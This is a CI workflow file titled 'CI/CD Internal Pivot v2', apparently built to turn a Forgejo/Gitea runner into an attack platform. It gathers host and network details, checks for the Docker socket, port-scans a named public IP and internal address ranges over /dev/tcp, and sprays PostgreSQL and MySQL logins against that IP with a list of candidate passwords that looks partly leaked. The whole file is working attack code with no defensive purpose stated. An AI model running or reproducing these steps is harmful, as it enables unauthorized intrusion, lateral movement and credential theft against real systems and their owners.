name: CI/CD Internal Pivot v2 on: [push, workflow_dispatch] jobs: recon: runs-on: linux-amd64 steps: - name: Host Recon run: | echo "=== RUNNER HOST ===" hostname whoami id echo "=== NETWORK ===" ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true ip route show 2>/dev/null || route -n 2>/dev/null || true cat /etc/hosts 2>/dev/null || true echo "=== DOCKER ===" ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" env | grep -i docker 2>/dev/null || true echo "=== INTERNAL CONNECTIVITY ===" for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do for port in 5432 3306 6379 3000 222 22 80 443; do timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port" done done - name: PostgreSQL Attack run: | echo "=== POSTGRESQL CREDENTIAL SPRAY ===" apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do echo "Testing: postgres / $pw" PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3 done - name: MySQL Attack run: | echo "=== MYSQL CREDENTIAL SPRAY ===" apt-get install -y -qq mysql-client 2>/dev/null || true for user in root forgejo gitea admin; do for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1 done done